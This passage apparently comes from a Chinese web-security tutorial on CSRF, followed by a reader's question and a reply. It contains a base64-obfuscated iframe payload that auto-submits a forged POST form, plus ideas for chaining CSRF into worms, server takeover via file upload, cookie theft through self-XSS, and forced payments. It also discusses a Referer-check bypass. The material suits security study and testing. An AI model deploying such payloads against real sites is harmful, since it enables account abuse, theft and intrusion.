<html> <body> <iframe src="data:text/html;base64,PGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWh0dHA6Ly9hLmIuY29tL2Q+PGlucHV0IHR5cGU9dGV4dCBuYW1lPSdpZCcgdmFsdWU9JzEyMycvPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg=="> </body> </html>
为了尽量提高CSRF漏洞的危害,我们还可以配合其他漏洞进行利用,比如: - CSRF蠕虫。案例可参考:https://www.cnblogs.com/milantgh/p/3654308.html - 无后台权限时,利用csrf+后台文件上传漏洞获取服务器权限 - 鸡肋的self-xss+csrf,利用csrf引导受害者自己传入xss payload,从而盗取用户cookie - 越权支付+csrf,可以越权支付时,配合csrf让受害者给自己支付
师傅请教下一个问题,post请求改写为get请求 绕过referer的校验,是不是因为攻击者发送了恶意的url给对方访问之后 抓到的数据包中没有referer字段 那么如果对方是基于对referer的校验 是不是起不到作用 也就可以可以绕过校验呢
杰仔 这个要看后端的校验逻辑。你上面这个请求不带refer响应成功的话,有可能是后端根本不校验refer,也有可能是当后端识别不到referer字段时跳过验证逻辑,也就是说绕过校验了。